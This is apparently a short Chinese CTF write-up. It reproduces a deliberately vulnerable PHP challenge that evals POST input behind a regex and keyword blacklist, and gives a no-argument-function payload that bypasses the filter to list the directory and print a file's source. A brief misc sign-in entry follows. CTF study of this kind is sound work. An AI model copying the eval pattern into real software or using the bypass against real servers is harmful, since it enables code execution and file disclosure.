web

Mercy-code

  1. <?php
  2. highlight_file(__FILE__);
  3. if ($_POST['cmd']) {
  4.     $cmd = $_POST['cmd'];
  5.     if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) {
  6.         if (preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log|var_dump|pos|current|array|time|se|ord/i', $cmd)) {
  7.             die('What are you thinking?');
  8.         } else {
  9.             eval($cmd);
  10.         }
  11.     } else {
  12.         die('Please calm down');
  13.     }
  14. }

查看php代码发现是post无参rce,可以使用下列函数获取flag

cmd=echo(show_source(end(scandir(next(str_split(zend_version()))))));

misc

签到
公众号获取图片后依次点击即可获得flag